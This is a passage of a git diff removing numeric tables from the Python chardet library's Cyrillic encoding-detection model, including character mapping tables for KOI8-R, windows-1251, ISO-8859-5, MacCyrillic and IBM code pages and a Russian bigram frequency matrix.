-1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1, -1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0, -2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2, -2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1, -1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0, -1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0, -2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0, -1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1, -0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0, -2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1, -1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1, -1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0, -0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1, -0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1, -0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,1,1,2,0,2,1,1,1,1,0,2,2,0,0,0,0,0,0,0,0,0,1,1,0,0,0,1,1, -0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -1,0,2,1,2,0,0,0,0,0,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0,0,0, -0,0,1,0,1,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -1,0,0,0,0,2,0,1,2,1,0,1,1,1,0,1,0,0,0,1,0,1,0,0,1,0,1,0,0,0,0,1, -0,0,0,0,0,1,0,0,1,1,0,0,1,1,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1, -2,2,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,0,0,0,1,0,0,0,1,1,0,0,0,0,0,0,0,1,0,0,0,0,0,1,0,0,1,0,0,0,0,0, -2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,1,1,0,1,0,1,0,0,1,1,1,1,0,0,0,1,0,0,0,0,1,0,0,0,1,0,1,0,0,0,0, -1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -1,1,0,1,1,0,1,0,1,0,0,0,0,1,1,0,1,1,0,0,0,0,0,1,0,1,1,0,1,0,0,0, -0,1,1,1,1,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,1,0,0,0,0,1,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0, -) - -Koi8rModel = { \ - 'charToOrderMap': KOI8R_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "KOI8-R" -} - -Win1251CyrillicModel = { \ - 'charToOrderMap': win1251_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "windows-1251" -} - -Latin5CyrillicModel = { \ - 'charToOrderMap': latin5_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "ISO-8859-5" -} - -MacCyrillicModel = { \ - 'charToOrderMap': macCyrillic_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "MacCyrillic" -}; - -Ibm866Model = { \ - 'charToOrderMap': IBM866_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "IBM866" -} - -Ibm855Model = { \ - 'charToOrderMap': IBM855_CharToOrderMap, - 'precedenceMatrix': RussianLangModel, - 'mTypicalPositiveRatio': 0.976601, - 'keepEnglishLetter': False, - 'charsetName': "IBM855" -} diff --git a/chardet/chardet/langcyrillicmodel.py.bak b/chardet/chardet/langcyrillicmodel.py.bak deleted file mode 100644 index e604cc7..0000000 --- a/chardet/chardet/langcyrillicmodel.py.bak +++ /dev/null @@ -1,329 +0,0 @@ -######################## BEGIN LICENSE BLOCK ######################## -# The Original Code is Mozilla Communicator client code. -# -# The Initial Developer of the Original Code is -# Netscape Communications Corporation. -# Portions created by the Initial Developer are Copyright (C) 1998 -# the Initial Developer. All Rights Reserved. -# -# Contributor(s): -# Mark Pilgrim - port to Python -# -# This library is free software; you can redistribute it and/or -# modify it under the terms of the GNU Lesser General Public -# License as published by the Free Software Foundation; either -# version 2.1 of the License, or (at your option) any later version. -# -# This library is distributed in the hope that it will be useful, -# but WITHOUT ANY WARRANTY; without even the implied warranty of -# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU -# Lesser General Public License for more details. -# -# You should have received a copy of the GNU Lesser General Public -# License along with this library; if not, write to the Free Software -# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA -# 02110-1301 USA -######################### END LICENSE BLOCK ######################### - -import constants - -# KOI8-R language model -# Character Mapping Table: -KOI8R_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, # 80 -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, # 90 -223,224,225, 68,226,227,228,229,230,231,232,233,234,235,236,237, # a0 -238,239,240,241,242,243,244,245,246,247,248,249,250,251,252,253, # b0 - 27, 3, 21, 28, 13, 2, 39, 19, 26, 4, 23, 11, 8, 12, 5, 1, # c0 - 15, 16, 9, 7, 6, 14, 24, 10, 17, 18, 20, 25, 30, 29, 22, 54, # d0 - 59, 37, 44, 58, 41, 48, 53, 46, 55, 42, 60, 36, 49, 38, 31, 34, # e0 - 35, 43, 45, 32, 40, 52, 56, 33, 61, 62, 51, 57, 47, 63, 50, 70, # f0 -) - -win1251_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, -239,240,241,242,243,244,245,246, 68,247,248,249,250,251,252,253, - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -) - -latin5_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, -) - -macCyrillic_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, -239,240,241,242,243,244,245,246,247,248,249,250,251,252, 68, 16, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27,255, -) - -IBM855_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 -191,192,193,194, 68,195,196,197,198,199,200,201,202,203,204,205, -206,207,208,209,210,211,212,213,214,215,216,217, 27, 59, 54, 70, - 3, 37, 21, 44, 28, 58, 13, 41, 2, 48, 39, 53, 19, 46,218,219, -220,221,222,223,224, 26, 55, 4, 42,225,226,227,228, 23, 60,229, -230,231,232,233,234,235, 11, 36,236,237,238,239,240,241,242,243, - 8, 49, 12, 38, 5, 31, 1, 34, 15,244,245,246,247, 35, 16,248, - 43, 9, 45, 7, 32, 6, 40, 14, 52, 24, 56, 10, 33, 17, 61,249, -250, 18, 62, 20, 51, 25, 57, 30, 47, 29, 63, 22, 50,251,252,255, -) - -IBM866_CharToOrderMap = ( \ -255,255,255,255,255,255,255,255,255,255,254,255,255,254,255,255, # 00 -255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255, # 10 -253,253,253,253,253,253,253,253,253,253,253,253,253,253,253,253, # 20 -252,252,252,252,252,252,252,252,252,252,253,253,253,253,253,253, # 30 -253,142,143,144,145,146,147,148,149,150,151,152, 74,153, 75,154, # 40 -155,156,157,158,159,160,161,162,163,164,165,253,253,253,253,253, # 50 -253, 71,172, 66,173, 65,174, 76,175, 64,176,177, 77, 72,178, 69, # 60 - 67,179, 78, 73,180,181, 79,182,183,184,185,253,253,253,253,253, # 70 - 37, 44, 33, 46, 41, 48, 56, 51, 42, 60, 36, 49, 38, 31, 34, 35, - 45, 32, 40, 52, 53, 55, 58, 50, 57, 63, 70, 62, 61, 47, 59, 43, - 3, 21, 10, 19, 13, 2, 24, 20, 4, 23, 11, 8, 12, 5, 1, 15, -191,192,193,194,195,196,197,198,199,200,201,202,203,204,205,206, -207,208,209,210,211,212,213,214,215,216,217,218,219,220,221,222, -223,224,225,226,227,228,229,230,231,232,233,234,235,236,237,238, - 9, 7, 6, 14, 39, 26, 28, 22, 25, 29, 54, 18, 17, 30, 27, 16, -239, 68,240,241,242,243,244,245,246,247,248,249,250,251,252,255, -) - -# Model Table: -# total sequences: 100% -# first 512 sequences: 97.6601% -# first 1024 sequences: 2.3389% -# rest sequences: 0.1237% -# negative sequences: 0.0009% -RussianLangModel = ( \ -0,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,1,1,3,3,3,3,1,3,3,3,2,3,2,3,3, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,0,3,2,2,2,2,2,0,0,2, -3,3,3,2,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,2,3,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,2,2,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,2,3,3,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,2,3,3,3,3,3,3,3,3,3,3,3,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1, -0,0,0,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,3,3,0,0,3,3,3,3,3,3,3,3,3,3,3,2,1, -0,0,0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,2,2,2,3,1,3,3,1,3,3,3,3,2,2,3,0,2,2,2,3,3,2,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,3,3,2,2,3,2,3,3,3,2,1,2,2,0,1,2,2,2,2,2,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,3,2,2,2,3,0,2,2,3,3,2,1,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,1,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,1,2,3,2,2,3,2,3,3,3,3,2,2,3,0,3,2,2,3,1,1,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,2,2,3,3,3,3,3,2,3,3,3,3,2,2,2,0,3,3,3,2,2,2,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,2,3,2,3,3,3,3,3,3,2,3,2,2,0,1,3,2,1,2,2,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,2,1,1,3,0,1,1,1,1,2,1,1,0,2,2,2,1,2,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,2,2,2,2,1,3,2,3,2,3,2,1,2,2,0,1,1,2,1,2,1,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,3,3,3,3,3,3,2,2,3,2,3,3,3,2,2,2,2,0,2,2,2,2,3,1,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,2,3,2,2,3,3,3,3,3,3,3,3,3,1,3,2,0,0,3,3,3,3,2,3,3,3,3,2,3,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,3,2,2,3,3,0,2,1,0,3,2,3,2,3,0,0,1,2,0,0,1,0,1,2,1,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,0,3,0,2,3,3,3,3,2,3,3,3,3,1,2,2,0,0,2,3,2,2,2,3,2,3,2,2,3,0,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,0,2,3,2,3,0,1,2,3,3,2,0,2,3,0,0,2,3,2,2,0,1,3,1,3,2,2,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,1,3,0,2,3,3,3,3,3,3,3,3,2,1,3,2,0,0,2,2,3,3,3,2,3,3,0,2,2,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,2,2,2,3,3,0,0,1,1,1,1,1,2,0,0,1,1,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,2,3,3,3,3,3,3,3,0,3,2,3,3,2,3,2,0,2,1,0,1,1,0,1,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,3,2,3,3,3,2,2,2,2,3,1,3,2,3,1,1,2,1,0,2,2,2,2,1,3,1,0, -0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0, -2,2,3,3,3,3,3,1,2,2,1,3,1,0,3,0,0,3,0,0,0,1,1,0,1,2,1,0,0,0,0,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,2,1,1,3,3,3,2,2,1,2,2,3,1,1,2,0,0,2,2,1,3,0,0,2,1,1,2,1,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,2,3,3,3,3,1,2,2,2,1,2,1,3,3,1,1,2,1,2,1,2,2,0,2,0,0,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,3,2,1,3,2,2,3,2,0,3,2,0,3,0,1,0,1,1,0,0,1,1,1,1,0,1,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,2,3,3,3,2,2,2,3,3,1,2,1,2,1,0,1,0,1,1,0,1,0,0,2,1,1,1,0,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0, -3,1,1,2,1,2,3,3,2,2,1,2,2,3,0,2,1,0,0,2,2,3,2,1,2,2,2,2,2,3,1,0, -0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -3,3,3,3,3,1,1,0,1,1,2,2,1,1,3,0,0,1,3,1,1,1,0,0,0,1,0,1,1,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,1,3,3,3,2,0,0,0,2,1,0,1,0,2,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,0,1,0,0,2,3,2,2,2,1,2,2,2,1,2,1,0,0,1,1,1,0,2,0,1,1,1,0,0,1,1, -1,0,0,0,0,0,1,2,0,0,0,0,0,1,0,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,3,0,0,0,0,1,0,0,0,0,3,0,1,2,1,0,0,0,0,0,0,0,1,1,0,0,1,1, -1,0,1,0,1,2,0,0,1,1,2,1,0,1,1,1,1,0,1,1,1,1,0,1,0,0,1,0,0,1,1,0, -2,2,3,2,2,2,3,1,2,2,2,2,2,2,2,2,1,1,1,1,1,1,1,0,1,0,1,1,1,0,2,1, -1,1,1,1,1,1,1,1,2,1,1,1,1,1,1,1,1,1,1,0,1,0,1,1,0,1,1,1,0,1,1,0, -3,3,3,2,2,2,2,3,2,2,1,1,2,2,2,2,1,1,3,1,2,1,2,0,0,1,1,0,1,0,2,1, -1,1,1,1,1,2,1,0,1,1,1,1,0,1,0,0,1,1,0,0,1,0,1,0,0,1,0,0,0,1,1,0, -2,0,0,1,0,3,2,2,2,2,1,2,1,2,1,2,0,0,0,2,1,2,2,1,1,2,2,0,1,1,0,2, -1,1,1,1,1,0,1,1,1,2,1,1,1,2,1,0,1,2,1,1,1,1,0,1,1,1,0,0,1,0,0,1, -1,3,2,2,2,1,1,1,2,3,0,0,0,0,2,0,2,2,1,0,0,0,0,0,0,1,0,0,0,0,1,1, -1,0,1,1,0,1,0,1,1,0,1,1,0,2,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0, -2,3,2,3,2,1,2,2,2,2,1,0,0,0,2,0,0,1,1,0,0,0,0,0,0,0,1,1,0,0,2,1, -1,1,2,1,0,2,0,0,1,0,1,0,0,1,0,0,1,1,0,1,1,0,0,0,0,0,1,0,0,0,0,0, -3,0,0,1,0,2,2,2,3,2,2,2,2,2,2,2,0,0,0,2,1,2,1,1,1,2,2,0,0,0,1,2, -1,1,1,1,1,0,1,2,1,1,1,1,1,1,1,0,1,1,1,1,1,1,0,1,1,1,1,1,1,0,0,1, -2,3,2,3,3,2,0,1,1,1,0,0,1,0,2,0,1,1,3,1,0,0,0,0,0,0,0,1,0,0,2,1, -1,1,1,1,1,1,1,0,1,0,1,1,1,1,0,1,1,1,0,0,1,1,0,1,0,0,0,0,0,0,1,0, -2,3,3,3,3,1,2,2,2,2,0,1,1,0,2,1,1,1,2,1,0,1,1,0,0,1,0,1,0,0,2,0, -0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -2,3,3,3,2,0,0,1,1,2,2,1,0,0,2,0,1,1,3,0,0,1,0,0,0,0,0,1,0,1,2,1, -1,1,2,0,1,1,1,0,1,0,1,1,0,1,0,1,1,1,1,0,1,0,0,0,0,0,0,1,0,1,1,0, -1,3,2,3,2,1,0,0,2,2,2,0,1,0,2,0,1,1,1,0,1,0,0,0,3,0,1,1,0,0,2,1, -1,1,1,0,1,1,0,0,0,0,1,1,0,1,0,0,2,1,1,0,1,0,0,0,1,0,1,0,0,1,1,0, -3,1,2,1,1,2,2,2,2,2,2,1,2,2,1,1,0,0,0,2,2,2,0,0,0,1,2,1,0,1,0,1, -2,1,1,1,1,1,1,1,1,1,1,1,1,1,1,0,2,1,1,1,0,1,0,1,1,0,1,1,1,0,0,1, -3,0,0,0,0,2,0,1,1,1,1,1,1,1,0,1,0,0,0,1,1,1,0,1,0,1,1,0,0,1,0,1, -1,1,0,0,1,0,0,0,1,0,1,1,0,0,1,0,1,0,1,0,0,0,0,1,0,0,0,1,0,0,0,1, -1,3,3,2,2,0,0,0,2,2,0,0,0,1,2,0,1,1,2,0,0,0,0,0,0,0,0,1,0,0,2,1, -0,1,1,0,0,1,1,0,0,0,1,1,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,1,0, -2,3,2,3,2,0,0,0,0,1,1,0,0,0,2,0,2,0,2,0,0,0,0,0,1,0,0,1,0,0,1,1, -1,1,2,0,1,2,1,0,1,1,2,1,1,1,1,1,2,1,1,0,1,0,0,1,1,1,1,1,0,1,1,0, -1,3,2,2,2,1,0,0,2,2,1,0,1,2,2,0,0,1,0,0,0,0,0,0,0,0,0,1,0,0,1,1, -0,0,1,1,0,1,1,0,0,1,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -1,0,0,1,0,2,3,1,2,2,2,2,2,2,1,1,0,0,0,1,0,1,0,2,1,1,1,0,0,0,0,1, -1,1,0,1,1,0,1,1,1,1,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,0,0,1,0,0,0, -2,0,2,0,0,1,0,3,2,1,2,1,2,2,0,1,0,0,0,2,1,0,0,2,1,1,1,1,0,2,0,2, -2,1,1,1,1,1,1,1,1,1,1,1,1,2,1,0,1,1,1,1,0,0,0,1,1,1,1,0,1,0,0,1, -1,2,2,2,2,1,0,0,1,0,0,0,0,0,2,0,1,1,1,1,0,0,0,0,1,0,1,2,0,0,2,0, -1,0,1,1,1,2,1,0,1,0,1,1,0,0,1,0,1,1,1,0,1,0,0,0,1,0,0,1,0,1,1,0, -2,1,2,2,2,0,3,0,1,1,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,1, -0,0,0,1,1,1,0,0,1,0,1,0,0,0,0,0,1,0,0,0,1,0,0,0,0,0,0,0,0,1,0,0, -1,2,2,3,2,2,0,0,1,1,2,0,1,2,1,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,1, -0,1,1,0,0,1,1,0,0,1,1,0,0,1,1,0,1,1,0,0,1,0,0,0,0,0,0,0,0,1,1,0, -2,2,1,1,2,1,2,2,2,2,2,1,2,2,0,1,0,0,0,1,2,2,2,1,2,1,1,1,1,1,2,1, -1,1,1,1,1,1,1,1,1,1,0,0,1,1,1,0,1,1,1,0,0,0,0,1,1,1,0,1,1,0,0,1, -1,2,2,2,2,0,1,0,2,2,0,0,0,0,2,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,2,0, -0,0,1,0,0,1,0,0,0,0,1,0,1,1,0,0,1,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0, -0,0,2,0,0,0,0,0,0,0,0,0,0,0,0,0,2,0,0,0,0,0,0,0,0,0,0,1,0,0,0,0, -0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,0,2,2,2,0,1,0,1,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,1,1, -0,1,1,0,0,1,1,0,0,0,1,0,0,0,0,0,0,1,0,0,0,0,0,0,0,0,0,0,0,0,0,0, -1,2,2,2,2,0,0,0,0,1,0,0,1,1,2,0,0,0,0,1,0,1,0,0,1,0,0,2,0,0,0,1, -0,0,1,0,0,1,0,0,0,1,1,0,0,0,0,0,1,0,0,1,1,0,0,0,0,0,0,0,0,0,0,0, 